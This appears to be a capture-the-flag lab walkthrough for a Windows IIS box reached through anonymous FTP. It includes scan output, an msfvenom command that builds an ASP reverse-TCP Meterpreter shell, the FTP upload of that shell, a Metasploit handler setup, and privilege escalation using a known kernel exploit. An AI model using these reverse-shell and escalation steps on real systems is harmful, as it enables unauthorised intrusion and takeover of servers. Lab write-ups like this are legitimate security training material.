When testing, almost always, my initial scanning includes Nmap, Nikto and Dirbuster. Starting with Nmap we have:
nmap -sS -A -T4 --top-ports 500 10.10.10.5 Nmap scan report for 10.10.10.5 Host is up (0.052s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
In parallel I fired nikto and dirbuster but nothing important came up. Based on the nmap results, port 21 (FTP) and 80 (Microsoft IIS) are open. It isn't so common to see the ftp port open, so let's try and access it. Apparently you can access the server files using ftp via anonymous login.
Awesome, we can now pass a .asp shell using msfvenom .
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipaddress LPORT=port -f asp > shell.asp
Then pass it, using FTP, to the server.
ftp 10.10.10.5 ftp> put shell.asp
Final step fire msfconsole and setup the handler:
msf> use exploit/multi/handler msf> set payload windows/meterpreter/reverse_tcp msf> set LHOST ipaddress msf> set LPORT port msf> exploit -j
http://10.10.10.5/shell.asp and wait for the connection to take place.
Apparently my shell was not working. At the time that was a bit weird, but in order to see what's going on, a friend of mine suggested building a Windows 7 VM with IIS to see what's wrong . I tried to set it up with the same permissions I had in the box and then checked the
shell.asp code. Allowing errors to show in IIS helped me identify that in line 60 (see Image below) my shellcode tried to create a file in a location that the user could not write, so we need to modify that.
As a result, I changed it to
C:\inetpub\wwwroot\file.exe where I was sure I could write.
Tried again and boom we have a working shell.
Now since we are looking for a quick win here, we run getsystem , but we get an Operation Failed: Access is Denied. However, we can then run a pretty neat metasploit post-exploitation script called local_exploit_suggester
The best technique you could use now is trial and error, until you find a working exploit. If all of them fail, then there are other techniques that we could use (Powershell, etc - Maybe in another writeup). Here, it is a bit easier because the
ms13_053_schlamperei exploit works.
I believe that these type of boxes, that are easy to pwn, are also able to teach someone a few important lessons. One of them is the fact that you should never rely 100% on the tools you are using and if you are stuck, always try to simulate the situation you are in, in order to understand what's going wrong. The last thing to take away from this writeup is that metasploit is an amazing framework with loads of exploits and post-exploitation techniques.